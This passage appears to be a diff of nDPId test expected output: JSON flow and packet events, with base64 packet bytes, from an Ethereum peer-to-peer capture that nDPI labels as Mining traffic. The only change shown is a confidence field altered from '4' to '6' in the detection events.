01980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1578508364694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAASM2BBAADcR1ngiYawWwKgBuHZfdl8EeMBgH0wTNhnEtwanpj7oWlZ\/Hp0Gak0vyLNY48lrCKzEN97iWOlAwiKU8J2As0GDwpvqMobAk\/doYUwERgBj\/dX1qwI+w93bqV+opA8zeXK5DOY5QqaAWe1EmRlafyw14V0SAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2ENiSg04J2X4J2X7hAPRqHFTz0e8oEsmOadgUbUG0\/Gq1XFXFWshB59yMDlMnzDbSaQte3vRlNp0x8bXK\/C0IExkQW+7e6O42uaIsSOfhNhG\/lALSCTtaCTta4QNKaGvf27ePtI09PYWMWWoqsTgBFWVV\/OStWx2mo9mqS58z7TiK83yibq71BZSi0CSsekwb4Zyr8nj5zQd0mqCb4TYSkhGWfgnZfgnZfuEBoaZQlH\/tAMTmENPyYivdiK6qXFlTxe+\/p6cPLqiael7D6BFBiRXZHacw3oUOaGk4+u32W1NMUjoJXk06B2mEI+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhHLbOhmCTtaCTta4QOsAfRHCWayd+ePpaQzEOGf3dXjZZgxjuurzp9q\/DaDAlIrlX0hFIpZGowqYAlmPGRQlb2Zp7G196tUzRB5lA1D4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2EI9yzYIJ2YIJ2YLhAOJyQU2JE6mr+PrqS1VpbvrNoILvKRQR+abFnLs+XgISTnL1u7Up3BqfrKb9hyDFv4+EivNbWhPn9c0jykBsfLvhNhC9ngvuCdmKCdmK4QMQewuj5qn6FtR+caLmA7fiCCCWlXl5n4eHsa\/hStv5IXJfR3qW2xYlmjRashSfhzXIk\/cArlEuFCVyLKkliTzj4TYR68x8XgglNgk7WuEDyUr+wEhCRTzC+abav+Qq8gCoJQuHHGbcH\/DZQmfl9EGgUirj+pxEJRc8L7rXREu747IWcesHQp9HRE6vORWkC+E2E1W2gk4Kvx4Kvx7hAdMXaCMYMMwBE0nd2ZguY7X9OffS41d7S\/Y+mPW\/bN2r4s5PDjCrWaOVF\/TvDBjFcUWsPiqOXMHIqsOoggNo9SvhNhE4vwp6Cdl+Cdl+4QPkOM4NqDnpAiCaFdcv7mpRSPLANloklV4wbFH\/35BGlAWuLnC96pYG30ySaUekbUEoxDdJFuDpuhxs7uesYXD\/4TYSOLK6TgnZhgnZhuEDoktJdZWuqibhkACX5AYXpi\/92jauNHaPZe57KQENT7f3lptm8vn\/KsHCyQGycNosbcDhgVNlPlUl4B5KRi2QIhF4WIGA="} 00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1578508364694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAAF02BFAADcR2Y8iYawWwKgBuHZfdl8BYBsKk2vVIKFBe5srt6TuKGLoSQyIYHTHTIh8E6CjfYCc9i8bqGNRb1RdySNn+Iv9WrBeYgM40YLK2f29HLFDjWvrLH5PzXOrZjlyFrfNSw\/LgHRZLq7JZkTKJJivek9A0KFTAQT49Pjt+E2EWSTXC4J2YYJ2YbhAKsm6hrEBgceppDA8y6y8ToI4LATCvXtK2lH6G5Ea4z\/xJThSCDAuG5MSvtPStPEkcnXcb7SOx0jpL4DMcyqusPhNhJ+KPreCdl+Cdl+4QFFks1Hi1w5Dzl6eTycY4XMH5jgPi\/IsM\/Xh\/aiCTq6KUBnNNvsH2QEEcq8Eurha1gzN35pyz9iUxxW+rcV0tUj4TYTPtOCBgg09gg09uEBD39Z7PE\/miF\/gBzQtLgOKuJmlQiP1\/EPNHjqCw\/jys2eg7dySq1uz5KP5CQPL3LPisAyyzl2cNiKWtBUo4PgQhF4WIGA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1578508364697,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364697,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHkfoAAEARTtTAqAG4NiSg03Zfdl8As+iZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1578508364729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7gO1AADART9iAADOMwKgBuHZfdl8EJxcg9PffAeslidE0A2XYKUWPfQSrSzELT24RQsZMkDFAUC\/8t71UobxaKgVF9YFxtOS9Li4RLrxMDnrT4k5PGgw2NDHZtKrKg8J\/d2YlScEj\/YBR+sG3bhx8yqSCwFLu+QmtAQT5A7r5A7L4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2ETi\/CnoJ2X4J2X7hA+Q4zg2oOekCIJoV1y\/ualFI8sA2WiSVXjBsUf\/fkEaUBa4ucL3qlgbfTJJpR6RtQSjEN0kW4Om6HGzu56xhcP\/hNhF6CJvWCdl+Cdl+4QCa0AdVA2\/h5KxbzG7wSXhKLcgLDQf3VZM6j4pcDpEr22I0w8vjr3eeZrANzqy+B0k7Jw6sj9qOYOkYu9v1\/HcL4S4QXZGXDgsVFgLhA4dMHiHESZvaZv5XwOSEg7GIAhtTuq\/1+kuZamW7NEWy5Mx7jYjqriPSY+yi8MCrIJ809xx8ts8E05ybrI5RK9vhNhHTKaT+Cdl+Cdl+4QNscTNh1YzVnvcLB2a2lU2bz3gyaTlXXbE+pFLDVoDdFI5ADpod42cruH9wQt79YZLxlJa01FygTlV6X9wnzbsb4TYRSpWAfgnZhgnZhuECxFAegsyOgyfrql\/zztxCELDSekbbhUJf21H8iSNiW9cKP2xirrTz8RKLVHxNA2LkFNcMF8l9m+GUUJJ3wo0ve+E2EZ\/0rzIJ2X4J2X7hA0+1Q\/zfDwmqiJ4L7\/yvPXaADca3\/aoKeqi6XasejIDSTPmS2ILmdZ2LgwWGNQRAtsR66VqR5PIUppHE6JTXzu\/hNhC9aDGqCdl+Cdl+4QEWucUJTr5uswusybUrNZinvmACa+spHP3M8Ca80aMiKTDP2An9QqqbsJgkcvDnFqQSdwmVB0j3FFWWOWXchmBH4TYQ03B+BglLcglLcuEC4ECYNzxwi2kJoJQjyJ6lUniuRlC+UndNWqAZRufW0X533Ymm1WtW8x0w\/1eGqPwGeOGNfU57w7mmrZv5S0MuC+E2EoBCKUoJ2X4J2X7hA7pvrsi4uzujUwcCnzbOXM3k+PSTxp6vSaGlZ+vjNNS2DLnFg12pt76j1a3+aMxZ2sjeuJ4ACTqyhbBihj1yObfhNhLB96meCdl+Cdl+4QMGwHxHg22IaagGZCrHWyox4ceWSrkz5+TUJ7FvSKEAsyUrKnBQ1BKg4U4OyDXv653Ump5Su2Klg\/PAjth\/4FVX4TYQDCFzcgnZfgnZfuEAOe5LjgOGocDnrwWucrGwohrnh\/PIVvUNi2EPcxA3lL9o2I1kGKrrcltIHdy07g5GmzReWD9IntTCd9ncDRnHuhF4WIGA="} 01011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1578508364729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFgO5AADARUk2AADOMwKgBuHZfdl8BsUbFE+HTPyEyomNSay73CyfrLD8rHnhX7vxj92G3He3rB8i3yggvxA3gI120fMxC8T5NSVg69zUML0xXdXDn6x+i1UJlYzm2ZsL8HkXRcVxsD7\/Cz8uc2cDeR5GmI31rs3BBAAT5AUT5ATz4TYRWzyr3gnZfgnZfuEAwPG4npPFCKterF6wXX6hmKDtHpPLV5Gpyh4HRvQlb1WOtMBiFa5iB1p48IlU7yQzlUhHlEKU2TAWk+UxWCOtE+E2EwKkGMYJ2X4J2X7hAXDWjwnntCdEfY7ZsbIcma6dZim0sS\/6AZlg+cBMsOylaupmT4K85DC7A88jAAB9\/AkNP7Q7FRuWOzTw655z20fhNhF\/YD6SCdl+Cdl+4QMhe7o3oH5yNMBpAbg7BFfLQiRhzAx0IcRlGupvV\/Zui89t4l4x5tGAZhBv4cgNKbiHVFqGfCeCtDh7KA5ZNUtn4TYQ2yX4zgnZfgnZfuEBWXo894U5qji3Sd9oPTupJEBwpi5JkOWop7uGO9PMehSCnS4eHg4+tauk7NJIwG19teeCjKxS93DtycMhLIWGEhF4WIGA="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1578508364732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364732,"pkt":"EBMx8Tl2KDc3AG3ICABFAACccxcAAEAR1EDAqAG4b+UAtHZfTtYAiDTvS0gyrIvyYAXql+rzEz+AR\/cLOiJor5McpZ3aQTzvVtbxvdlPVHOvm8x2T63kxRajQJXVXM7hf79y1fQG9XWokxXgcqkKLlUPoIFVVYrTntTkZjbBJdoltYqy5v2xN8\/CAAHdBMuEfwAAAYJ2X4J2X8mEb+UAtIJO1oCEXhYgYAU="} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1578508364773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGASMuzZAAC8R8ro2JKDTwKgBuHZfdl8EeHOhfS8\/VKeU4xriCeJZNmbyiR29m3N42\/uIKvLbiJlgdyaSwrO2BgcDcenrD2C97edthDBouwifboHgE3u3hLHcQi8I2aNx02z5+NzOkszQMNgplhV2V\/wYwtE8G8IvYQ3cAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2E0WGPAYLDUILDULhAQhNvCoDxAncltx4bh9WffZwzBdE\/9xF06wXJo57MMUhoLLSI90CIePrV\/tYmYiKEiyDSrJDYOlCFHmZ3pqDCwfhNhGoMJ6iCdn2Cdn24QH6QBf7Np\/9Y+eiOrugFzIsIhVcNcp\/OYct+34QkqEfvlXbuNfWnoEs1IzwGORRl6zR7xwwZW1+45dnGnJxxFET4TYTAnuIugnZfgnZfuECuDYcQjm3wJMglum1qnPXPBozHysGZ9VxiaJNnx\/kw7dAhqZoxI6CdfBdLdPaGhgI412g7XwrxymiHNjtEpybV+E2Eb+UAtIJO1oJO1rhA0poa9\/bt4+0jT09hYxZaiqxOAEVZVX85K1bHaaj2apLnzPtOIrzfKJurvUFlKLQJKx6TBvhnKvyePnNB3SaoJvhNhKSEZZ+Cdl+Cdl+4QGhplCUf+0AxOYQ0\/JiK92IrqpcWVPF77+npw8uqJp6XsPoEUGJFdkdpzDehQ5oaTj67fZbU0xSOgleTToHaYQj4TYSygMxlgsNQgsNQuEAJaLOKzWf\/o+pIN3tGz2TU0Jj7rRUsEu\/g\/J\/izFMRqT2L21hSkEIu4pwcRIudbxWCEi7R3jpR3Qx72SJ7sDxL+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhNFhtVyCw1CCw1C4QGNRrcySTkrIddsTkghzBE5yaZovlz823kaODYnxRULrhcdtfhDSmheK1rkdzx6MLgmWRkcqk5yLSRXbV7Sa9hv4TYSUZnN9gnQ9gnQ9uECK3QCjct4kYgqQwECFpzDV6FidxjszhMNuNu5KPckeHeVnNGRrmrvdWVqSm7NdhSk\/GBSTMV30P4Rv7pq1hSjo+E2ENL1ESYILzYILzbhAFgxun0r0zdyAC5SZb67xXu\/2hxGmSEaQZz1XosQe6902lrVgE71jlymkTkVmiGnjo+wcj5gGrpBHOVgGl5DUX\/hNhFCeJFKCdl+Cdl+4QPL7djWpmmTz8plIeSEj91S2rY+aeiMQAn6m9zZuLcDbcgnpEzw4Bbj2GboSA\/6fD1Ct0nUU6+rf7UzNqpXAqYL4TYRvYnEBgnZfgnZfuED0pW7OSkAUUx9PeHXwwyf7mqpd70LmGPSseSc9VRhmuql9pusBMDKDEfCCcSaAIW2BnfDoTpS113ylm2TbVhfWhF4WIGA="} 00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1578508364773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGAF0uzdAAC8R9dE2JKDTwKgBuHZfdl8BYMxaEf6gK86OMmqC0hj8YCjT4Kxyd9QhLNhUWv84IcoZEEM5WLaEl0iNjPoH5MGkDBtHCCGzykqH2IyxlA4UZhPcyDumXz\/v4mlSvZfRB2yOu5AYhwCSwbpUWhfp9lpeKanwAQT49Pjt+E2EdbUsoIIrq4Irq7hAjNB3wOfdUkch\/RymD8COogkRfmtGHDZ3JfVp7qPL0g95b9d6Og4eqk7Oc5yCXUjsPCBRZNV\/OEkCcWVLTRMhqvhNhDb\/yRuCdl+Cdl+4QBkaEptJyzZcwNghsa\/yev+qS1D63n8u0YIQqdir49AX7Q7OxcqumEYHw1gpXkn8\/0NtWmRXiIMnyNsmLKeGv434TYQj3LNggnZggnZguEA4nJBTYkTqav4+upLVWlu+s2ggu8pFBH5psWcuz5eAhJOcvW7tSncGp+spv2HIMW\/j4SK81taE+f1zSPKQGx8uhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1578508364776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364776,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc6zkAAEARbFTAqAG40WGPAXZfw1AAiAuoYX\/X5Uw4lffkPNHSCMW6SrDFB88ojJJssa\/u4MiJ7ftgjBcFdVPuw+tvNym45804Q6\/uLh0oQsOr0riQp0FxmC7+mATc88CsFLix8wyPMseFlTK290MHGwkPORWZli5hAQHdBMuEfwAAAYJ2X4J2X8mE0WGPAYLDUICEXhYgYAU="} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 